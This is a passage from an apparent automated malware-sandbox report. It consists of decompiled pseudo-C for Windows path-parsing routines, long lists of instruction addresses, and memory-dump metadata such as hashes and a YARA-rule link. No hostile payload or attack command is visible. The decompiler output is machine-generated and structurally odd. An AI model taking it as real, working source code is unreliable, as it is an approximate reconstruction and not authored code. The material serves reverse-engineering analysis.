																									if( *((short*)(_t386 + _t422 * 2 - 4)) != 0x2e) {
																										_t422 = _t422 - 1;
																										_v96 = _t422;
																									}
																								}
																							}
																						}
																						break;
																					} else {
																						 *(_t386 + _t422 * 2) = _t369;
																						_t422 = _t422 + 1;
																						_v96 = _t422;
																						_t445 = _t445 + 1;
																						_v76 = _t445;
																						continue;
																					}
																				}
																				_t445 = _t445 - 1;
																				_v76 = _t445;
																				goto L43;
																			}
																			_t155 = _t445 + 2; // 0x3
																			_t425 = _v88;
																			if(_t155 == _t435) {
																				while(1) {
																					L103:
																					if(_t422 < _v80) {
																						break;
																					}
																					 *(_t386 + _t422 * 2) = 0;
																					_t425 = _v88;
																					if( *(_t386 + _t422 * 2) != 0x5c) {
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																						continue;
																					} else {
																						goto L105;
																					}
																					while(1) {
																						L105:
																						if(_t422 < _v80) {
																							goto L180;
																						}
																						 *(_t386 + _t422 * 2) = 0;
																						_t435 = _v120;
																						if( *(_t386 + _t422 * 2) == 0x5c) {
																							if(_t422 < _v80) {
																								goto L180;
																							}
																							L110:
																							_t445 = _t445 + 1;
																							_v76 = _t445;
																							goto L43;
																						}
																						_t422 = _t422 - 1;
																						_v96 = _t422;
																					}
																					break;
																				}
																				L180:
																				_t422 = _t422 + 1;
																				_v96 = _t422;
																				goto L110;
																			}
																			_t375 =  *(_t367 + 4 + _t445 * 2) & 0x0000ffff;
																			if(_t375 != 0x5c) {
																				if(_t375 != 0x2f) {
																					goto L35;
																				}
																			}
																			goto L103;
																		}
																		L83:
																		_t445 = _v104;
																		_v76 = _t445;
																		goto L43;
																	}
																	if(_t365 == 1) {
																		goto L44;
																	} else {
																		goto L35;
																	}
																}
																_t449 = _v80;
																if(_v57 != 0) {
																	if(_t422 > _t449) {
																		if( *((short*)(_t386 + _t422 * 2 - 2)) == 0x5c) {
																			_t422 = _t422 - 1;
																			_v96 = _t422;
																		}
																	}
																}
																_t439 = _v92;
																if(_t422 >= _v92) {
																	L52:
																	if(_t422 == 0) {
																		L56:
																		_t425 = _t422 + _t422;
																		_v52 = _t425;
																		if(_v112 != 0) {
																			_t357 = _t422;
																			while(1) {
																				_v100 = _t357;
																				if(_t357 == 0) {
																					break;
																				}
																				if( *((short*)(_t386 + _t357 * 2 - 2)) == 0x5c) {
																					break;
																				}
																				_t357 = _t357 - 1;
																			}
																			if(_t357 >= _t422) {
																				L113:
																				 *_v112 = 0;
																				goto L57;
																			}
																			if(_t357 < _t449) {
																				goto L113;
																			}
																			 *_v112 = _t386 + _t357 * 2;
																		}
																		L57:
																		_t446 = _t425 & 0x0000ffff;
																		_v64 = _t446;
																		goto L58;
																	}
																	_t422 = _t422 - 1;
																	_v96 = _t422;
																	_t360 =  *(_t386 + _t422 * 2) & 0x0000ffff;
																	if(_t360 == 0x20) {
																		goto L51;
																	}
																	if(_t360 == 0x2e) {
																		goto L51;
																	}
																	_t422 = _t422 + 1;
																	_v96 = _t422;
																	goto L56;
																} else {
																	L51:
																	 *(_t386 + _t422 * 2) = 0;
																	goto L52;
																}
																L69:
																if( *((short*)(_t386 + _t420 * 2)) == 0x2f) {
																	 *((short*)(_t386 + _t420 * 2)) = 0x5c;
																}
																_t420 = _t420 + 1;
																_v100 = _t420;
																_t352 = _v56;
																goto L28;
															}
															_t446 = _t417 & 0x0000ffff;
															_v64 = _t446;
															_t439 = _v92;
															goto L58;
														}
														if(_v116 > 8) {
															goto L26;
														}
														_t446 = 0xa;
														_v64 = 0xa;
														_t439 = _v92;
														goto L58;
													}
													L72:
													if(_t415 > 0xffff) {
														_t446 = 0;
													}
													_v64 = _t446;
													_t439 = _v92;
													goto L58;
												}
												L26:
												_t352 = _v56;
												goto L27;
											}
										}
										_t379 = _t336[2] & 0x0000ffff;
										if(_t379 != 0x5c) {
											if(_t379 == 0x2f) {
												goto L22;
											}
											goto L98;
										}
										L22:
										_t337 = 2;
									}
									goto L23;
								}
								_t450 =  *_t336 & 0x0000ffff;
								if(_t450 == 0x5c || _t450 == 0x2f) {
									if(_t407 < 4) {
										L132:
										_t337 = 4;
										goto L23;
									}
									_t451 = _t336[1] & 0x0000ffff;
									if(_t451 != 0x5c) {
										if(_t451 == 0x2f) {
											goto L87;
										}
										goto L132;
									}
									L87:
									if(_t407 < 6) {
										L135:
										_t337 = 1;
										goto L23;
									}
									_t452 = _t336[2] & 0x0000ffff;
									if(_t452 != 0x2e) {
										if(_t452 == 0x3f) {
											goto L89;
										}
										goto L135;
									}
									L89:
									if(_t407 < 8) {
										L134:
										_t337 = ((0 | _t407 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
										goto L23;
									}
									_t384 = _t336[3] & 0x0000ffff;
									if(_t384 != 0x5c) {
										if(_t384 == 0x2f) {
											goto L91;
										}
										goto L134;
									}
									L91:
									_t337 = 6;
									goto L23;
								} else {
									goto L17;
								}
							}
						}
					}
					goto L124;
				}
			}

0x01436e30
0x01436e35
0x01436e37
0x01436e3c
0x01436e47
0x01436e4b
0x01436e50
0x01436e53
0x01436e55
0x01436e5b
0x01436e5f
0x01436e65
0x01436e68
0x01436e6a
0x01436e6d
0x01436e70
0x01436e73
0x01436e76
0x01436e79
0x01436e7c
0x01436e7f
0x01436e84
0x0143710f
0x0143710f
0x01436e8c
0x01436e8e
0x01436e8e
0x01436e97
0x0147f5d3
0x0147f5d3
0x01436e9d
0x01436ea3
0x01436eaa
0x01436ead
0x01436eb2
0x01436eb4
0x01436eb7
0x01437466
0x01437466
0x00000000
0x01436ebd
0x01436ebd
0x01436ec4
0x01436eca
0x01436ecc
0x01436ecf
0x01436ed2
0x01436ede
0x0147f5df
0x0147f5e0
0x00000000
0x0147f5e0
0x01436ee6
0x00000000
0x00000000
0x01436eec
0x01436ef3
0x01437181
0x01436f02
0x01436f02
0x01436f02
0x01436f0b
0x01436f0d
0x01436f10
0x01436f17
0x01436f21
0x01436f24
0x01436f2d
0x01436f31
0x01436f36
0x01436f3d
0x01437413
0x01437416
0x01437419
0x0143741c
0x01437421
0x0143742b
0x0143742b
0x0143742e
0x01437439
0x0147f60b
0x0147f60b
0x0147f615
0x0147f619
0x0143743f
0x01437447
0x01437454
0x0143745a
0x0143745f
0x0143745f
0x00000000
0x01437439
0x01437425
0x0147f5e9
0x0147f5ed
0x0147f5f4
0x00000000
0x00000000
0x0147f5fd
0x00000000
0x00000000
0x0147f603
0x0147f603
0x00000000
0x01436f43
0x01436f43
0x01436f45
0x01436f48
0x01436f4e
0x01436f65
0x01436f68
0x0143721f
0x01436f83
0x01436f86
0x014372dc
0x014372dc
0x01436f9e
0x01436fa1
0x01436fa3
0x01436fa5
0x01436fa8
0x01436fab
0x01436fae
0x01436fb1
0x01436fb4
0x01436fb6
0x01436fb9
0x01436fbf
0x0143718a
0x0143718e
0x0147f831
0x0147f831
0x0147f833
0x0147f836
0x00000000
0x0147f836
0x01437194
0x00000000
0x0147f658
0x0147f658
0x0147f65a
0x0147f65d
0x0147f662
0x0147f662
0x0147f665
0x0147f667
0x00000000
0x00000000
0x0147f669
0x0147f66c
0x0147f670
0x0147f673
0x0147f67a
0x0147f67a
0x0147f67b
0x0147f67e
0x0147f681
0x00000000
0x00000000
0x0147f683
0x0147f683
0x00000000
0x0147f683
0x0147f675
0x0147f678
0x00000000
0x00000000
0x00000000
0x0147f678
0x0147f686
0x0147f688
0x0147f68b
0x0147f68e
0x0147f691
0x0147f694
0x0147f698
0x0147f69c
0x0147f6a0
0x00000000
0x00000000
0x00000000
0x00000000
0x01437397
0x0143739c
0x0143739f
0x014373a3
0x014373a5
0x0147f6bb
0x0147f6c1
0x0147f6c4
0x014373ab
0x014373ab
0x014373ab
0x014373b1
0x014373b5
0x014373ba
0x014373c0
0x014373c3
0x014373c7
0x014373cc
0x014373d0
0x014373d3
0x0147f6cc
0x0147f6d4
0x0147f6d9
0x0147f6dd
0x0147f6e1
0x0147f6e5
0x0147f6f0
0x0147f6fc
0x0147f700
0x0147f709
0x0147f70e
0x0147f710
0x0147f784
0x0147f788
0x0147f78b
0x0147f78e
0x0147f790
0x0147f792
0x0147f795
0x0147f798
0x0147f7b7
0x0147f7b7
0x0147f7ba
0x0147f7ba
0x00000000
0x0147f7ba
0x0147f79a
0x0147f79d
0x00000000
0x00000000
0x0147f79f
0x0147f7a4
0x0147f7a7
0x0147f7ab
0x0147f7ae
0x0147f7b1
0x00000000
0x0147f7b1
0x0147f712
0x0147f717
0x0147f74c
0x0147f74e
0x0147f752
0x0147f756
0x0147f75d
0x0147f761
0x0147f764
0x0147f76c
0x0147f771
0x0147f775
0x0147f778
0x0147f77c
0x00000000
0x0147f77c
0x0147f719
0x0147f71d
0x0147f720
0x0147f723
0x0147f726
0x0147f729
0x0147f72e
0x0147f740
0x0147f744
0x00000000
0x0147f744
0x0147f730
0x0147f732
0x0147f735
0x0147f738
0x00000000
0x014373d9
0x014373d9
0x014373db
0x014373de
0x014373e1
0x014373e4
0x014373e7
0x014373ea
0x014373ef
0x014373f2
0x014373f6
0x014373f9
0x014373f9
0x014373fe
0x01437401
0x01437406
0x01437409
0x00000000
0x01437409
0x00000000
0x0147f7c5
0x0147f7ca
0x0147f7cd
0x0147f7d1
0x0147f7d3
0x0147f7da
0x0147f7e0
0x0147f7e3
0x0147f7e3
0x0147f7e6
0x0147f7d5
0x0147f7d5
0x0147f7d5
0x0147f7e9
0x0147f7eb
0x0147f7f0
0x0147f7f3
0x0147f7f5
0x0147f7f8
0x0147f7fb
0x0147f7fe
0x0147f801
0x0147f80f
0x0147f814
0x0147f803
0x0147f803
0x0147f806
0x0147f806
0x00000000
0x00000000
0x0143719d
0x014371a2
0x014371a5
0x014371a9
0x014371ab
0x0147f826
0x0147f829
0x014371b1
0x014371b1
0x014371ba
0x014371ba
0x014371bf
0x014371c5
0x014371cf
0x014371d2
0x014371d8
0x014371dd
0x014371e4
0x014371e7
0x00000000
0x00000000
0x01437275
0x0143727a
0x0143727d
0x0143727f
0x01437282
0x01437284
0x0147f6a8
0x0147f6aa
0x0147f6aa
0x0143728a
0x0143728f
0x01437292
0x01437297
0x0143729a
0x0143729d
0x014372a0
0x014372a5
0x014372a9
0x014372ac
0x014372af
0x014372b2
0x014372b5
0x014372b7
0x014372ba
0x014372be
0x014372be
0x014372c2
0x014372c5
0x014372c8
0x0147f6b2
0x0147f6b2
0x00000000
0x00000000
0x01436fc5
0x01436fc5
0x01436fcc
0x01436fd8
0x01436fda
0x01436fdd
0x01436fe3
0x01437162
0x0147f845
0x00000000
0x00000000
0x0147f84e
0x0147f8c4
0x0147f8c8
0x0147f8cb
0x0147f8ce
0x014370e0
0x014370e0
0x014370e3
0x014370e3
0x014370ea
0x014370ef
0x014370f1
0x014370f4
0x014370fc
0x014370fd
0x014370fe
0x0143710c
0x0143710c
0x0147f850
0x0147f858
0x0147f87a
0x0147f88a
0x0147f88d
0x0147f890
0x0147f893
0x0147f895
0x0147f898
0x0147f8a4
0x0147f8ad
0x0147f8b0
0x0147f8b3
0x0147f8b3
0x0147f8a4
0x01436fec
0x01436fec
0x01436fee
0x00000000
0x01436ff1
0x01436ff8
0x00000000
0x01436ffe
0x01437004
0x01437006
0x01437006
0x01437010
0x01437017
0x0143701e
0x01437072
0x01437074
0x0143707e
0x01437083
0x01437087
0x01437088
0x0143706c
0x0143706c
0x0143706d
0x00000000
0x0143706d
0x0143707c
0x00000000
0x00000000
0x00000000
0x0143707c
0x01437020
0x01437023
0x014371ef
0x014371ef
0x014371f2
0x014371f7
0x00000000
0x00000000
0x014371fd
0x01437200
0x01437205
0x0143720b
0x0143720e
0x014372eb
0x00000000
0x00000000
0x014372f6
0x00000000
0x01437030
0x01437037
0x0143703e
0x01437055
0x0143705a
0x01437062
0x0147f908
0x0147f90e
0x0147f90f
0x0147f90f
0x0147f908
0x01437062
0x0143705a
0x00000000
0x01437045
0x01437045
0x01437049
0x0143704a
0x0143704d
0x0143704e
0x00000000
0x0143704e
0x0143703e
0x01437068
0x01437069
0x00000000
0x01437069
0x014372fc
0x01437301
0x01437304
0x01437314
0x01437314
0x01437319
0x00000000
0x00000000
0x01437325
0x0143732d
0x01437330
0x01437356
0x01437357
0x00000000
0x00000000
0x00000000
0x00000000
0x01437332
0x01437332
0x01437337
0x00000000
0x00000000
0x01437343
0x0143734b
0x0143734e
0x01437361
0x00000000
0x00000000
0x01437367
0x01437367
0x01437368
0x00000000
0x01437368
0x01437350
0x01437351
0x01437351
0x00000000
0x01437332
0x0147f8f9
0x0147f8f9
0x0147f8fa
0x00000000
0x0147f8fa
0x01437306
0x0143730e
0x0147f8ee
0x00000000
0x00000000
0x0147f8f4
0x00000000
0x0143730e
0x01437214
0x01437214
0x01437217
0x00000000
0x01437217
0x0143702c
0x00000000
0x00000000
0x00000000
0x00000000
0x0143702c
0x0143708d
0x01437094
0x01437098
0x014370a0
0x0143738c
0x0143738d
0x0143738d
0x014370a0
0x01437098
0x014370a6
0x014370ab
0x014370b3
0x014370b5
0x014370cd
0x014370cd
0x014370d0
0x014370d8
0x0143711a
0x0143711c
0x0143711c
0x01437121
0x00000000
0x00000000
0x01437129
0x00000000
0x00000000
0x0143712b
0x0143712b
0x01437130
0x0143737e
0x01437381
0x00000000
0x01437381
0x01437138
0x00000000
0x00000000
0x01437144
0x01437144
0x014370da
0x014370da
0x014370dd
0x00000000
0x014370dd
0x014370b7
0x014370b8
0x014370bb
0x014370c2
0x00000000
0x00000000
0x014370c7
0x00000000
0x00000000
0x014370c9
0x014370ca
0x00000000
0x014370ad
0x014370ad
0x014370af
0x00000000
0x014370af
0x01437148
0x0143714d
0x0147f8e2
0x0147f8e2
0x01437153
0x01437154
0x01437157
0x00000000
0x01437157
0x0147f87c
0x0147f87f
0x0147f882
0x00000000
0x0147f882
0x0147f85e
0x00000000
0x00000000
0x0147f864
0x0147f869
0x0147f86c
0x00000000
0x0147f86c
0x01437168
0x01437170
0x0147f8d6
0x0147f8d6
0x01437176
0x01437179
0x00000000
0x01437179
0x01436fe9
0x01436fe9
0x00000000
0x01436fe9
0x01436fbf
0x01436f8c
0x01436f93
0x014372d6
0x00000000
0x00000000
0x00000000
0x014372d6
0x01436f99
0x01436f99
0x01436f99
0x00000000
0x01436f68
0x01436f50
0x01436f56
0x0143722c
0x0147f629
0x0147f629
0x00000000
0x0147f629
0x01437232
0x01437239
0x0147f623
0x00000000
0x00000000
0x00000000
0x0147f623
0x0143723f
0x01437242
0x0147f64e
0x0147f64e
0x00000000
0x0147f64e
0x01437248
0x0143724f
0x01437373
0x00000000
0x00000000
0x00000000
0x01437379
0x01437255
0x01437258
0x0147f63c
0x0147f648
0x00000000
0x0147f648
0x0143725e
0x01437265
0x0147f636
0x00000000
0x00000000
0x00000000
0x0147f636
0x0143726b
0x0143726b
0x00000000
0x00000000
0x00000000
0x00000000
0x01436f56
0x01436f3d
0x01436ed2
0x00000000
0x01436ec4

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 023cc2f999b7fb861b6db7ad3058433fb08e0e55f1015851fbd78c37241c68e1
Instruction ID: b4ac90d02b954e209e99ed37383ef53074a3fc04c49402160fb509b3b14b5d5b
Opcode Fuzzy Hash: 023cc2f999b7fb861b6db7ad3058433fb08e0e55f1015851fbd78c37241c68e1
Instruction Fuzzy Hash: FF029EB5D00215CBDB28CF99C5906BEBBB1EF88701F65402FE995AB371E7709886CB40

Uniqueness

Uniqueness Score: -1.00%

Function 01434120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E01434120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x150d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0144F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E01436E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01434620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E01436E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M014345F8))) {
												case 0:
													_v568 = 0x13f1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x13f11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01434620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0145F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0145F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E014152A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0142EB70(1, 0x15079a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0142AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E014595D0();
																			L014377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L014377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0145B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01453D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0145B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x01434128
0x01434135
0x0143413c
0x01434141
0x01434145
0x01434147
0x0143414e
0x01434151
0x01434159
0x0143415c
0x01434160
0x01434164
0x01434168
0x0143416c
0x0143417f
0x01434181
0x0143446a
0x0143446a
0x0143418c
0x01434195
0x01434199
0x01434432
0x01434439
0x0143443d
0x01434442
0x01434447
0x00000000
0x0143419f
0x014341a3
0x014341b1
0x014341b9
0x014341bd
0x014345db
0x014345db
0x00000000
0x014341c3
0x014341c3
0x014341ce
0x014341d4
0x0147e138
0x0147e13e
0x0147e169
0x0147e16d
0x0147e19e
0x0147e16f
0x0147e16f
0x0147e175
0x0147e179
0x0147e18f
0x0147e193
0x00000000
0x0147e199
0x00000000
0x0147e199
0x0147e193
0x00000000
0x00000000
0x00000000
0x014341da
0x014341da
0x014341df
0x014341e4
0x014341ec
0x01434203
0x01434207
0x0147e1fd
0x01434222
0x01434226
0x0147e1f3
0x0147e1f3
0x0143422c
0x0143422c
0x01434233
0x0147e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01434239
0x01434239
0x01434239
0x01434239
0x01434233
0x01434226
0x014341ee
0x014341ee
0x014341f4
0x01434575
0x0147e1b1
0x0147e1b1
0x00000000
0x0143457b
0x0143457b
0x01434582
0x0147e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x01434588
0x01434588
0x0143458c
0x0147e1c4
0x0147e1c4
0x00000000
0x01434592
0x01434592
0x01434599
0x0147e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x0143459f
0x0143459f
0x014345a3
0x0147e1d7
0x0147e1e4
0x00000000
0x014345a9
0x014345a9
0x014345b0
0x0147e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x014345b6
0x014345b6
0x014345b6
0x00000000
0x014345b6
0x014345b0
0x014345a3
0x01434599
0x0143458c
0x01434582
0x00000000
0x00000000
0x00000000
0x00000000
0x014341f4
0x0143423e
0x01434241
0x014345c0
0x014345c4
0x00000000
0x014345ca
0x014345ca
0x00000000
0x0147e207
0x0147e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x014345d1
0x00000000
0x00000000
0x014345ca
0x00000000
0x01434247
0x01434247
0x01434247
0x01434249
0x01434249
0x01434249
0x01434251
0x01434251
0x01434257
0x0143425f
0x0143426e
0x01434270
0x0143427a
0x0147e219
0x0147e219
0x01434280
0x01434282
0x01434456
0x014345ea
0x00000000
0x014345f0
0x0147e223
0x00000000
0x0147e223
0x0143445c
0x0143445c
0x00000000
0x0143445c
0x00000000
0x01434288
0x0143428c
0x0147e298
0x01434292
0x01434292
0x0143429e
0x014342a3
0x014342a7
0x014342ac
0x0147e22d
0x014342b2
0x014342b2
0x014342b9
0x014342bc
0x014342c2
0x014342ca
0x014342cd
0x014342cd
0x014342d4
0x0143433f
0x0143433f
0x014342d6
0x014342d6
0x014342d9
0x014342dd
0x014342eb
0x0147e23a
0x014342f1
0x01434305
0x0143430d
0x01434315
0x01434318
0x0143431f
0x01434322
0x0143432e
0x0143433b
0x0143433b
0x00000000
0x0143432e
0x014342eb
0x0143434c
0x0143434e
0x01434352
0x01434359
0x0143435e
0x01434361
0x0143436e
0x0143438a
0x0143438e
0x01434396
0x0143439e
0x014343a1
0x014343ad
0x014343bb
0x014343bb
0x014343ad
0x0143436e
0x014343bf
0x014343c5
